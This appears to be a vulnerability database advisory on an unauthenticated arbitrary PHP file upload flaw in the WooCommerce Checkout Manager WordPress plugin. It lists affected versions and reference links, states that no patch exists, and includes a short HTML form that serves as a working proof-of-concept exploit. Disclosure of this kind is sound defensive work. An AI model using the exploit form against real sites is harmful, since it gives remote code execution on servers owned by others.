Unrestricted file upload in WooCommerce Checkout Manager
| Risk | High |
| Patch available | NO |
| Number of vulnerabilities | 1 |
| CVE-ID | N/A |
| CWE-ID | CWE-434 |
| Exploitation vector | Network |
| Public exploit | Public exploit code for vulnerability #1 is available. |
| Vulnerable software Subscribe |
WooCommerce Checkout Manager Web applications / Modules and components for CMS |
| Vendor | Visser Labs |
Security Bulletin
This security bulletin contains one high risk vulnerability.
1) Arbitrary file upload
EUVDB-ID: #VU18353
Risk: High
CVSSv3.1:
CVE-ID: N/A
CWE-ID:
Exploit availability:
DescriptionThe vulnerability allows a remote attacker to compromise vulnerable application.
The vulnerability exists due to missing restrictions when uploading PHP files via the "/wp-admin/admin-ajax.php" URL, when action is set to "wccs_upload_file_func" and valid "order_id" identifier is set. A remote non-authenticated attacker can upload and execute arbitrary PHP file on the server.
Exploitation example:
<html> <body> <form action="http://[host]/wp-admin/admin-ajax.php?action=wccs_upload_file_func&order_id=[order ID]&name=test" method="POST" enctype="multipart/form-data"> <input type="file" name="test[1]" /> <input type="submit" value="Submit" /> </form> </body> </html>Mitigation
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.
Vulnerable software versionsWooCommerce Checkout Manager: 3.0 - 4.2.6
Fixed software versionsCPE2.3 External links
http://www.pluginvulnerabilities.com/2019/04/23/our-proactive-monitoring-caught-an-arbitrary-file-upload-vulnerability-in-woocommerce-checkout-manager/
http://medium.com/@xorloop/wordpress-security-researcher-gone-rogue-a76484ed0fc9
Q & A
Can this vulnerability be exploited remotely?
Is there known malware, which exploits this vulnerability?
